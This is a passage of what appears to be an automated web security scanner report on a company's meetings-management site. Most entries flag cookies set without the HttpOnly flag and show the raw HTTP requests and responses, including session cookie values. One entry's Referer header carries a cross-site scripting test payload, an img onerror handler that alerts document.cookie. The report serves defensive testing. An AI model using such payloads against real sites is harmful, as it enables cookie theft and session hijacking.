Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:25:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:58 GMT;path=/
Content-Length: 18313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...

2.75. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:35:22 GMT;path=/
Content-Length: 17925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...

2.76. http://www2.starcite.com/starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents/events/webinar-introducing-starcites-life-sciences-solution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:08 GMT;path=/
Content-Length: 19158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...

2.77. http://www2.starcite.com/starcite/newsletters/november2010/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsletters/november2010/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsletters/november2010/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:17 GMT
Server: Apache
Last-Modified: Tue, 30 Nov 2010 18:09:18 GMT
ETag: "1000000003407-656c-496491657ae22"
Accept-Ranges: bytes
Content-Length: 25964
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:43 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.78. http://www2.starcite.com/starcite/node/100  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/100

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/node/100 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:48 GMT;path=/
Content-Length: 13694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.79. http://www2.starcite.com/starcite/node/335/445  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/335/445

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/node/335/445 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:30 GMT;path=/
Content-Length: 15012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.80. http://www2.starcite.com/starcite/node/929  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/node/929

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/node/929 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:44 GMT;path=/
Content-Length: 13741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.81. http://www2.starcite.com/starcite/planners/findtherightsolution  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/findtherightsolution

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/findtherightsolution HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:55 GMT;path=/
Content-Length: 29497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="Desc
...[SNIP]...

2.82. http://www2.starcite.com/starcite/planners/howitworks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/howitworks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/howitworks HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:13 GMT;path=/
Content-Length: 26501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.83. http://www2.starcite.com/starcite/planners/meetings1-1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/meetings1-1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/meetings1-1 HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:10 GMT;path=/
Content-Length: 17018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.84. http://www2.starcite.com/starcite/planners/requestmoreinformation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/planners/requestmoreinformation

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/planners/requestmoreinformation HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:00 GMT;path=/
Content-Length: 52367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.85. http://www2.starcite.com/starcite/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/privacy HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:15:06 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:37:40 GMT;path=/
Content-Length: 50747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.86. http://www2.starcite.com/starcite/resource/findresources  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resource/findresources

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resource/findresources HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:59 GMT;path=/
Content-Length: 29216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.87. http://www2.starcite.com/starcite/resourcecenter/downloads/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resourcecenter/downloads/a HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:50 GMT;path=/
Content-Length: 36918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.88. http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:20 GMT;path=/
Content-Length: 38834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.89. http://www2.starcite.com/starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/resourcecenter/downloads/how-sunshine-provisions-impact-meetings-management HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
